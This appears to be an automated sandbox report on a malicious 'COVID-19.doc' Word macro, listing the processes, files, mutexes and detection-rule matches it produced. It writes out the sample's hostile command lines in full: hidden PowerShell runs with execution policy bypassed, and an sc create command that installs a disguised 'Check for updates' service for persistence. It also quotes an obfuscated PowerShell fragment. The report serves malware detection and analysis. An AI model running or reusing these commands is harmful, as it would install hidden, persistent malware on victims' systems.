Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\BIT36CF.tmpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_jtn2f3ar.yfz.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074F62D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074FE540
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074FE578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074F62C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074F9AA9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074F9AB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074F28C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07CF36CD
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C3051
Source: COVID-19.docOLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open
Source: COVID-19.docOLE indicator, VBA macros: true
Source: 00000004.00000002.793327668.000000000469F000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000002.789971993.0000000000B70000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000001.00000003.656718758.0000000005DD3000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: ReflectiveLoader description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score =
Source: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000003.740498295.0000000000BE4000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: Process Memory Space: powershell.exe PID: 5108, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: Process Memory Space: wscript.exe PID: 4248, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: Process Memory Space: svchost.exe PID: 2460, type: MEMORYMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: Process Memory Space: svchost.exe PID: 2460, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: Process Memory Space: powershell.exe PID: 2804, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\d569872345345[1].txt, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: C:\Users\user\Documents\20210120\PowerShell_transcript.648351.BCz0DRM3.20210120103110.txt, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 17.2.svchost.exe.4c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 17.2.svchost.exe.4c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score =
Source: 17.2.svchost.exe.4c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 17.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 17.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score =
Source: 17.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@30/27@1/4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C1B15 CreateToolhelp32Snapshot,Process32First,LocalAlloc,lstrlenA,Process32Next,CloseHandle,
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4680:120:WilError_01
Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\Global\730c0a4976f1cf34stp
Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\Global\730c0a4976f1cf34nps
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3828:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1740:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{5F040321-E322-4C6E-B01D-B15FD9B871F1} - OProcSessId.datJump to behavior
Source: COVID-19.docOLE indicator, Word Document stream: true
Source: COVID-19.docOLE document summary: title field not present or empty
Source: COVID-19.docOLE document summary: author field not present or empty
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc delete checkupdate
Source: unknownProcess created: C:\Windows\SysWOW64\sc.exe sc delete checkupdate
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc create checkupdate binpath= '%COMSPEC% /C start %COMSPEC% /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
Source: unknownProcess created: C:\Windows\SysWOW64\sc.exe sc create checkupdate binpath= 'C:\Windows\system32\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc start checkupdate
Source: unknownProcess created: C:\Windows\SysWOW64\sc.exe sc start checkupdate
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc delete checkupdate
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc create checkupdate binpath= '%COMSPEC% /C start %COMSPEC% /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc start checkupdate
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete checkupdate
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create checkupdate binpath= 'C:\Windows\system32\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start checkupdate
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Data Obfuscation:

barindex
Found suspicious powershell code related to unpacking or dynamic code loadingShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: Set-StrictMode -Version 2function sIZU{$BiYK=JqKKPZ '7'$BiYK}function dDJBY{$VpsSYb=AxKemD A v h e T U T I$Mm5mIV=oXkeJ F c '2' q$L2tm62=AUvxo q + O t C 9 U y W$L2tm62+$VpsSYb+$Mm5mIV}function QAQA{Pa
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C1A2F LoadLibraryA,GetProcAddress,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074FE4F9 pushfd ; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074FC10F push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074FAA18 pushfd ; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07CF5107 pushfd ; iretd
Source: unknownProcess created: C:\Windows\SysWOW64\sc.exe sc delete checkupdate
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
